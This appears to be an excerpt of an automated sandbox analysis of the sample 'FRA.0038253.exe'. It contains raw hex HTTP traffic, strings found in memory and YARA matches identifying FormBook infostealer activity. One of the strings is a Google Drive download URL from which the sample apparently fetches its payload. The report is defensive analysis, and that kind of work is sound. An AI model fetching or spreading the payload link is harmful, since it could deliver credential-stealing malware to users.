        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 22 May 2024 15:36:22 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 63 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bd 5b 73 e3 46 b2 30 f8 ee 5f 41 f1 84 d5 a4 1b 84 70 e7 ad d1 1a 8f a7 7d ec 38 33 b6 63 da 67 26 36 34 0a 05 44 82 22 dc 20 c0 03 80 52 cb 12 4f 6c ec c3 fe 8f 7d dc b7 f3 b0 5f c4 ee c3 be ec 2f 98 ef 1f 6d 66 15 ee 37 16 08 52 ea ee 23 d9 4d 82 40 55 66 65 56 56 56 66 56 55 e2 cd c9 dc 9d 05 f7 6b b3 b3 0c 56 f6 db 37 f8 d9 b1 0d e7 46 ef 7a 9b 6e 67 66 1b be af 77 2d ff ca 98 1b eb c0 ba 35 bb 9d b9 11 18 83 b5 e1 98 f6 60 e3 d9 7a 77 19 04 6b 7f 72 76 e6 9b de ad e9 a9 2a bf 74 fd c0 72 6e 78 cf 84 7f 9b b3 95 e1 18 37 a6 d7 05 e0 a6 31 7f fb 66 65 06 46 67 b6 34 3c df 0c f4 ee bf ff fa fd 60 d4 0d ef 3a c6 ca d4 bb b7 96 79 b7 76 bd 00 d0 bb 4e 60 3a 50 ea ce 9a 07 4b 7d 6e de 5a 33 73 40 7e 70 96 63 05 96 61 0f fc 99 61 9b ba 98 05 e1 b9 d7 6e e0 a7 00 38 ae e5 cc cd 8f 50 2a b0 02 db 7c fb cf ff e3 7f fe 6f ff f3 7f fd e7 7f fd f3 ff fd e7 ff fd 3f ff f7 7f fe 57 07 2e fe c7 a9 73 ed af a7 70 f5 5f ff fc 7f fe f9 7f fd f3 7f e0 d5 9b 33 5a e1 8d 1f dc db 66 67 65 ce 2d 43 ef 1a b6 dd 7d 7b f6 cd c9 37 9f fb df c9 37 ff f8 aa d3 41 3a 3a 33 df ef f0 67 8e 3b 37 af 56 ee 7c 63 9b fe 19 dc 1a d8 ae 31 37 bd 33 c2 3e fe 37 ff fc 7c 66 bb 8e 39 ff 2b 14 78 6f 06 03 8d df f8 e6 85 78 79 92 ab ba 06 21 48 55 f7 bd 59 0c 22 5f 14 fe c5 e5 e6 96 1f 9c cd 7e f3 69 b1 6b 73 75 76 6d bb b3 0f 3e 1f c9 df d9 35 c8 de 4d f4 c5 63 dd 0e d2 01 54 fc e3 b9 99 d9 fa ef ec 2b 9e d2 f5 00 7c 58 db c6 fd 64 61 9b 1f a7 f8 31 98 5b 9e 39 0b 2c d7 99 cc 5c 7b b3 72 a6 64 18 4c 44 41 f8 7a ba b2 1c 3a 2a 26 b2 24 ac 3f 4e 97 a6 75 b3 0c e8 b3 b5 31 9f c3 68 9c a8 c3 f5 c7 8e d0 11 a6 2b c3 bb b1 9c 89 30 05 38 ae 37 f9 17 59 53 e0 ff e9 02 86 ca 44 94 a0 d0 8f 30 66 3c ee 5b 0f 46 17 f7 83 69 df 9a 81 35 33 3a 3f 99 1b 33 f9 c9 7d ef 99 e6 7b c3 f1 39 1f 3e 06 30 f6 ad c5 f4 da 98 7d b8 f1 dc 8d 33 9f fc cb 62 b1 98 0e ee cc eb 0f 56 30 08 8c f5 60 09 2d b2 b1 55 03 8a 36 f0 a0 de da f0 60 74 6e 51 e9 4c 1c 37 e8 f1 29 45 d3 ef 44 bc 70 41 ad 2c 6c f7 6e f0 71 b2 b4 e6 73 d3 d9 fe 81 0c c3 4e 2f a1 5b 14 24 65 fd b1 ff 90 86 50 03 60 1b 3e ba 42 d5 77 05 cd f8 00 2c 7a 40 70 09 eb 6e 97 d9 52 a6 e7 b9 1e 05 18 f1 54 d8 d1 f4 ab 95 e9 6c 06 58 18 3b 0e 9e cf cd 39 d7 bc ca c0 98 61 99 08 ed 20 70 d7 80 ba 19 13 ca e0 e6 00 6e 1b 36 41 44 59 3b 40 33 ca c9 db 25 15 99 d2 a9 11 30 1e 6b d0 aa 1d 4c 86 27 d6 e2 7e 70 ed b9 77 20 ba 57 b7 96 6f 5d db 59 98 aa d2 98 b8 1d 6d 2a e5 07 6b 4b 92 ce 71 af 2d db 1c 44 32 7d 45 25 9a 8b 1e fb 9b 6b 64 f1 95 bb 36 41 4b c7 a2 1f 09 fe 0e be 5c 2d 5c 17 06 ff 60 ee de 39 3b 05 b5 bc 21 3b 6a 55 b5 2f 24 bc a9 38 ed 02 d7 58 3c 4b 89 2a 81 cb 5b 49 b7 47 ca 9a 4c 55 db 32 5e 3e a0 0a 9f 88 a0 7f 8d 4d e0 4e f3 bd 92 02 96 ad 96 d5 48 5f 37 a5 26 03 ab 84 86 92
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 22 May 2024 15:36:25 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 63 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bd 5b 73 e3 46 b2 30 f8 ee 5f 41 f1 84 d5 a4 1b 84 70 e7 ad d1 1a 8f a7 7d ec 38 33 b6 63 da 67 26 36 34 0a 05 44 82 22 dc 20 c0 03 80 52 cb 12 4f 6c ec c3 fe 8f 7d dc b7 f3 b0 5f c4 ee c3 be ec 2f 98 ef 1f 6d 66 15 ee 37 16 08 52 ea ee 23 d9 4d 82 40 55 66 65 56 56 56 66 56 55 e2 cd c9 dc 9d 05 f7 6b b3 b3 0c 56 f6 db 37 f8 d9 b1 0d e7 46 ef 7a 9b 6e 67 66 1b be af 77 2d ff ca 98 1b eb c0 ba 35 bb 9d b9 11 18 83 b5 e1 98 f6 60 e3 d9 7a 77 19 04 6b 7f 72 76 e6 9b de ad e9 a9 2a bf 74 fd c0 72 6e 78 cf 84 7f 9b b3 95 e1 18 37 a6 d7 05 e0 a6 31 7f fb 66 65 06 46 67 b6 34 3c df 0c f4 ee bf ff fa fd 60 d4 0d ef 3a c6 ca d4 bb b7 96 79 b7 76 bd 00 d0 bb 4e 60 3a 50 ea ce 9a 07 4b 7d 6e de 5a 33 73 40 7e 70 96 63 05 96 61 0f fc 99 61 9b ba 98 05 e1 b9 d7 6e e0 a7 00 38 ae e5 cc cd 8f 50 2a b0 02 db 7c fb cf ff e3 7f fe 6f ff f3 7f fd e7 7f fd f3 ff fd e7 ff fd 3f ff f7 7f fe 57 07 2e fe c7 a9 73 ed af a7 70 f5 5f ff fc 7f fe f9 7f fd f3 7f e0 d5 9b 33 5a e1 8d 1f dc db 66 67 65 ce 2d 43 ef 1a b6 dd 7d 7b f6 cd c9 37 9f fb df c9 37 ff f8 aa d3 41 3a 3a 33 df ef f0 67 8e 3b 37 af 56 ee 7c 63 9b fe 19 dc 1a d8 ae 31 37 bd 33 c2 3e fe 37 ff fc 7c 66 bb 8e 39 ff 2b 14 78 6f 06 03 8d df f8 e6 85 78 79 92 ab ba 06 21 48 55 f7 bd 59 0c 22 5f 14 fe c5 e5 e6 96 1f 9c cd 7e f3 69 b1 6b 73 75 76 6d bb b3 0f 3e 1f c9 df d9 35 c8 de 4d f4 c5 63 dd 0e d2 01 54 fc e3 b9 99 d9 fa ef ec 2b 9e d2 f5 00 7c 58 db c6 fd 64 61 9b 1f a7 f8 31 98 5b 9e 39 0b 2c d7 99 cc 5c 7b b3 72 a6 64 18 4c 44 41 f8 7a ba b2 1c 3a 2a 26 b2 24 ac 3f 4e 97 a6 75 b3 0c e8 b3 b5 31 9f c3 68 9c a8 c3 f5 c7 8e d0 11 a6 2b c3 bb b1 9c 89 30 05 38 ae 37 f9 17 59 53 e0 ff e9 02 86 ca 44 94 a0 d0 8f 30 66 3c ee 5b 0f 46 17 f7 83 69 df 9a 81 35 33 3a 3f 99 1b 33 f9 c9 7d ef 99 e6 7b c3 f1 39 1f 3e 06 30 f6 ad c5 f4 da 98 7d b8 f1 dc 8d 33 9f fc cb 62 b1 98 0e ee cc eb 0f 56 30 08 8c f5 60 09 2d b2 b1 55 03 8a 36 f0 a0 de da f0 60 74 6e 51 e9 4c 1c 37 e8 f1 29 45 d3 ef 44 bc 70 41 ad 2c 6c f7 6e f0 71 b2 b4 e6 73 d3 d9 fe 81 0c c3 4e 2f a1 5b 14 24 65 fd b1 ff 90 86 50 03 60 1b 3e ba 42 d5 77 05 cd f8 00 2c 7a 40 70 09 eb 6e 97 d9 52 a6 e7 b9 1e 05 18 f1 54 d8 d1 f4 ab 95 e9 6c 06 58 18 3b 0e 9e cf cd 39 d7 bc ca c0 98 61 99 08 ed 20 70 d7 80 ba 19 13 ca e0 e6 00 6e 1b 36 41 44 59 3b 40 33 ca c9 db 25 15 99 d2 a9 11 30 1e 6b d0 aa 1d 4c 86 27 d6 e2 7e 70 ed b9 77 20 ba 57 b7 96 6f 5d db 59 98 aa d2 98 b8 1d 6d 2a e5 07 6b 4b 92 ce 71 af 2d db 1c 44 32 7d 45 25 9a 8b 1e fb 9b 6b 64 f1 95 bb 36 41 4b c7 a2 1f 09 fe 0e be 5c 2d 5c 17 06 ff 60 ee de 39 3b 05 b5 bc 21 3b 6a 55 b5 2f 24 bc a9 38 ed 02 d7 58 3c 4b 89 2a 81 cb 5b 49 b7 47 ca 9a 4c 55 db 32 5e 3e a0 0a 9f 88 a0 7f 8d 4d e0 4e f3 bd 92 02 96 ad 96 d5 48 5f 37 a5 26 03 ab 84 86 92
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 22 May 2024 15:36:28 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 63 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bd 5b 73 e3 46 b2 30 f8 ee 5f 41 f1 84 d5 a4 1b 84 70 e7 ad d1 1a 8f a7 7d ec 38 33 b6 63 da 67 26 36 34 0a 05 44 82 22 dc 20 c0 03 80 52 cb 12 4f 6c ec c3 fe 8f 7d dc b7 f3 b0 5f c4 ee c3 be ec 2f 98 ef 1f 6d 66 15 ee 37 16 08 52 ea ee 23 d9 4d 82 40 55 66 65 56 56 56 66 56 55 e2 cd c9 dc 9d 05 f7 6b b3 b3 0c 56 f6 db 37 f8 d9 b1 0d e7 46 ef 7a 9b 6e 67 66 1b be af 77 2d ff ca 98 1b eb c0 ba 35 bb 9d b9 11 18 83 b5 e1 98 f6 60 e3 d9 7a 77 19 04 6b 7f 72 76 e6 9b de ad e9 a9 2a bf 74 fd c0 72 6e 78 cf 84 7f 9b b3 95 e1 18 37 a6 d7 05 e0 a6 31 7f fb 66 65 06 46 67 b6 34 3c df 0c f4 ee bf ff fa fd 60 d4 0d ef 3a c6 ca d4 bb b7 96 79 b7 76 bd 00 d0 bb 4e 60 3a 50 ea ce 9a 07 4b 7d 6e de 5a 33 73 40 7e 70 96 63 05 96 61 0f fc 99 61 9b ba 98 05 e1 b9 d7 6e e0 a7 00 38 ae e5 cc cd 8f 50 2a b0 02 db 7c fb cf ff e3 7f fe 6f ff f3 7f fd e7 7f fd f3 ff fd e7 ff fd 3f ff f7 7f fe 57 07 2e fe c7 a9 73 ed af a7 70 f5 5f ff fc 7f fe f9 7f fd f3 7f e0 d5 9b 33 5a e1 8d 1f dc db 66 67 65 ce 2d 43 ef 1a b6 dd 7d 7b f6 cd c9 37 9f fb df c9 37 ff f8 aa d3 41 3a 3a 33 df ef f0 67 8e 3b 37 af 56 ee 7c 63 9b fe 19 dc 1a d8 ae 31 37 bd 33 c2 3e fe 37 ff fc 7c 66 bb 8e 39 ff 2b 14 78 6f 06 03 8d df f8 e6 85 78 79 92 ab ba 06 21 48 55 f7 bd 59 0c 22 5f 14 fe c5 e5 e6 96 1f 9c cd 7e f3 69 b1 6b 73 75 76 6d bb b3 0f 3e 1f c9 df d9 35 c8 de 4d f4 c5 63 dd 0e d2 01 54 fc e3 b9 99 d9 fa ef ec 2b 9e d2 f5 00 7c 58 db c6 fd 64 61 9b 1f a7 f8 31 98 5b 9e 39 0b 2c d7 99 cc 5c 7b b3 72 a6 64 18 4c 44 41 f8 7a ba b2 1c 3a 2a 26 b2 24 ac 3f 4e 97 a6 75 b3 0c e8 b3 b5 31 9f c3 68 9c a8 c3 f5 c7 8e d0 11 a6 2b c3 bb b1 9c 89 30 05 38 ae 37 f9 17 59 53 e0 ff e9 02 86 ca 44 94 a0 d0 8f 30 66 3c ee 5b 0f 46 17 f7 83 69 df 9a 81 35 33 3a 3f 99 1b 33 f9 c9 7d ef 99 e6 7b c3 f1 39 1f 3e 06 30 f6 ad c5 f4 da 98 7d b8 f1 dc 8d 33 9f fc cb 62 b1 98 0e ee cc eb 0f 56 30 08 8c f5 60 09 2d b2 b1 55 03 8a 36 f0 a0 de da f0 60 74 6e 51 e9 4c 1c 37 e8 f1 29 45 d3 ef 44 bc 70 41 ad 2c 6c f7 6e f0 71 b2 b4 e6 73 d3 d9 fe 81 0c c3 4e 2f a1 5b 14 24 65 fd b1 ff 90 86 50 03 60 1b 3e ba 42 d5 77 05 cd f8 00 2c 7a 40 70 09 eb 6e 97 d9 52 a6 e7 b9 1e 05 18 f1 54 d8 d1 f4 ab 95 e9 6c 06 58 18 3b 0e 9e cf cd 39 d7 bc ca c0 98 61 99 08 ed 20 70 d7 80 ba 19 13 ca e0 e6 00 6e 1b 36 41 44 59 3b 40 33 ca c9 db 25 15 99 d2 a9 11 30 1e 6b d0 aa 1d 4c 86 27 d6 e2 7e 70 ed b9 77 20 ba 57 b7 96 6f 5d db 59 98 aa d2 98 b8 1d 6d 2a e5 07 6b 4b 92 ce 71 af 2d db 1c 44 32 7d 45 25 9a 8b 1e fb 9b 6b 64 f1 95 bb 36 41 4b c7 a2 1f 09 fe 0e be 5c 2d 5c 17 06 ff 60 ee de 39 3b 05 b5 bc 21 3b 6a 55 b5 2f 24 bc a9 38 ed 02 d7 58 3c 4b 89 2a 81 cb 5b 49 b7 47 ca 9a 4c 55 db 32 5e 3e a0 0a 9f 88 a0 7f 8d 4d e0 4e f3 bd 92 02 96 ad 96 d5 48 5f 37 a5 26 03 ab 84 86 92
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 22 May 2024 15:36:31 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingData Raw: 66 65 62 32 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 72 75 22 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 64 61 74 61 2d 70 61 6e 65 6c 2d 75 72 6c 3d 22 68 74 74 70 73 3a 2f 2f 73 65 72 76 65 72 35 35 2e 68 6f 73 74 69 6e 67 2e 72 65 67 2e 72 75 2f 6d 61 6e 61 67 65 72 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e d0 a1 d1 82 d1 80 d0 b0 d0 bd d0 b8 d1 86 d0 b0 20 d0 bd d0 b5 26 6e 62 73 70 3b d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd d0 b0 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 2f 2a 21 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 21 2a 5c 0a 20 20 21 2a 2a 2a 20 63 73 73 20 2e 2f 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 2f 63 73 73 2d 6c 6f 61 64 65 72 2f 69 6e 64 65 78 2e 6a 73 3f 3f 63 6c 6f 6e 65 64 52 75 6c 65 53 65 74 2d 36 2e 75 73 65 5b 31 5d 21 2e 2f 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 2f 70 6f 73 74 63 73 73 2d 6c 6f 61 64 65 72 2f 73 72 63 2f 69 6e 64 65 78 2e 6a 73 21 2e 2f 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 2f 6c 65 73 73 2d 6c 6f 61 64 65 72 2f 64 69 73 74 2f 63 6a 73 2e 6a 73 21 2e 2f 62 65 6d 2f 62 6c 6f 63 6b 73 2e 61 64 61 70 74 69 76 65 2f 62 2d 70 61 67 65 2f 62 2d 70 61 67 65 2e 6c 65 73 73 20 2a 2a 2a 21 0a 20 20 5c 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2f 0a 2e 62 2d 70 61 67 65 7b 64 69 73 70 6c 61 79 3a 66
        Source: FRA.0038253.exe, 00000003.00000003.2675158808.0000000005366000.00000004.00000020.00020000.00000000.sdmp, FRA.0038253.exe, 00000003.00000003.2647860234.000000000536D000.00000004.00000020.00020000.00000000.sdmp, FRA.0038253.exe, 00000003.00000003.2868413342.0000000005366000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
        Source: FRA.0038253.exe, 00000003.00000003.2675158808.0000000005366000.00000004.00000020.00020000.00000000.sdmp, FRA.0038253.exe, 00000003.00000003.2647860234.000000000536D000.00000004.00000020.00020000.00000000.sdmp, FRA.0038253.exe, 00000003.00000003.2868413342.0000000005366000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
        Source: FRA.0038253.exe, FRA.0038253.exe, 00000000.00000002.2675726026.000000000040A000.00000004.00000001.01000000.00000003.sdmp, FRA.0038253.exe, 00000000.00000000.2068548890.000000000040A000.00000008.00000001.01000000.00000003.sdmp, FRA.0038253.exe, 00000003.00000000.2484943484.000000000040A000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_Error
        Source: FRA.0038253.exe, 00000000.00000002.2675726026.000000000040A000.00000004.00000001.01000000.00000003.sdmp, FRA.0038253.exe, 00000000.00000000.2068548890.000000000040A000.00000008.00000001.01000000.00000003.sdmp, FRA.0038253.exe, 00000003.00000000.2484943484.000000000040A000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
        Source: FRA.0038253.exe, 00000003.00000001.2485904531.00000000005F2000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
        Source: FRA.0038253.exe, 00000003.00000001.2485904531.00000000005F2000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
        Source: FRA.0038253.exe, 00000003.00000003.2647988404.00000000053AC000.00000004.00000020.00020000.00000000.sdmp, FRA.0038253.exe, 00000003.00000003.2647860234.000000000536D000.00000004.00000020.00020000.00000000.sdmp, FRA.0038253.exe, 00000003.00000003.2647860234.000000000535E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
        Source: FRA.0038253.exe, 00000003.00000003.2938213391.0000000005315000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
        Source: FRA.0038253.exe, 00000003.00000002.2971794189.000000000532D000.00000004.00000020.00020000.00000000.sdmp, FRA.0038253.exe, 00000003.00000003.2938213391.0000000005315000.00000004.00000020.00020000.00000000.sdmp, FRA.0038253.exe, 00000003.00000003.2938213391.000000000532D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1sSTbdeAy6HZYgZE2D-KGpyeTtdrEakj3
        Source: FRA.0038253.exe, 00000003.00000003.2938213391.0000000005315000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1sSTbdeAy6HZYgZE2D-KGpyeTtdrEakj3&
        Source: FRA.0038253.exe, 00000003.00000002.2971794189.000000000532D000.00000004.00000020.00020000.00000000.sdmp, FRA.0038253.exe, 00000003.00000003.2938213391.000000000532D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1sSTbdeAy6HZYgZE2D-KGpyeTtdrEakj3P
        Source: FRA.0038253.exe, 00000003.00000003.2675158808.0000000005366000.00000004.00000020.00020000.00000000.sdmp, FRA.0038253.exe, 00000003.00000003.2868413342.0000000005366000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
        Source: FRA.0038253.exe, 00000003.00000003.2675158808.0000000005366000.00000004.00000020.00020000.00000000.sdmp, FRA.0038253.exe, 00000003.00000003.2868413342.0000000005366000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/2
        Source: FRA.0038253.exe, 00000003.00000002.2971981670.0000000005352000.00000004.00000020.00020000.00000000.sdmp, FRA.0038253.exe, 00000003.00000002.2971676746.00000000052E8000.00000004.00000020.00020000.00000000.sdmp, FRA.0038253.exe, 00000003.00000003.2675158808.0000000005366000.00000004.00000020.00020000.00000000.sdmp, FRA.0038253.exe, 00000003.00000003.2647988404.00000000053AC000.00000004.00000020.00020000.00000000.sdmp, FRA.0038253.exe, 00000003.00000003.2647860234.000000000536D000.00000004.00000020.00020000.00000000.sdmp, FRA.0038253.exe, 00000003.00000003.2647860234.000000000535E000.00000004.00000020.00020000.00000000.sdmp, FRA.0038253.exe, 00000003.00000003.2868413342.0000000005366000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1sSTbdeAy6HZYgZE2D-KGpyeTtdrEakj3&export=download
        Source: FRA.0038253.exe, 00000003.00000002.2971676746.00000000052E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1sSTbdeAy6HZYgZE2D-KGpyeTtdrEakj3&export=download(
        Source: FRA.0038253.exe, 00000003.00000003.2647988404.00000000053AC000.00000004.00000020.00020000.00000000.sdmp, FRA.0038253.exe, 00000003.00000003.2647860234.000000000536D000.00000004.00000020.00020000.00000000.sdmp, FRA.0038253.exe, 00000003.00000003.2647860234.000000000535E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
        Source: FRA.0038253.exe, 00000003.00000003.2647988404.00000000053AC000.00000004.00000020.00020000.00000000.sdmp, FRA.0038253.exe, 00000003.00000003.2647860234.000000000536D000.00000004.00000020.00020000.00000000.sdmp, FRA.0038253.exe, 00000003.00000003.2647860234.000000000535E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
        Source: FRA.0038253.exe, 00000003.00000003.2647988404.00000000053AC000.00000004.00000020.00020000.00000000.sdmp, FRA.0038253.exe, 00000003.00000003.2647860234.000000000536D000.00000004.00000020.00020000.00000000.sdmp, FRA.0038253.exe, 00000003.00000003.2647860234.000000000535E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
        Source: FRA.0038253.exe, 00000003.00000003.2647988404.00000000053AC000.00000004.00000020.00020000.00000000.sdmp, FRA.0038253.exe, 00000003.00000003.2647860234.000000000536D000.00000004.00000020.00020000.00000000.sdmp, FRA.0038253.exe, 00000003.00000003.2647860234.000000000535E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
        Source: FRA.0038253.exe, 00000003.00000003.2647988404.00000000053AC000.00000004.00000020.00020000.00000000.sdmp, FRA.0038253.exe, 00000003.00000003.2647860234.000000000536D000.00000004.00000020.00020000.00000000.sdmp, FRA.0038253.exe, 00000003.00000003.2647860234.000000000535E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
        Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
        Source: unknownHTTPS traffic detected: 142.250.69.206:443 -> 192.168.11.30:49793 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 142.251.33.97:443 -> 192.168.11.30:49794 version: TLS 1.2
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 0_2_004054D9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004054D9

        E-Banking Fraud

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 00000005.00000002.7156623320.0000000004360000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.7154033931.0000000000330000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.7156734462.00000000043A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.2959029682.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.7155964174.00000000008E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.7156338070.0000000003A50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.2986365523.0000000036400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

        System Summary

        barindex
        Malicious sample detected (through community Yara rule)
        Source: 00000005.00000002.7156623320.0000000004360000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000005.00000002.7154033931.0000000000330000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000005.00000002.7156734462.00000000043A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000003.00000002.2959029682.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000006.00000002.7155964174.00000000008E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000004.00000002.7156338070.0000000003A50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000003.00000002.2986365523.0000000036400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
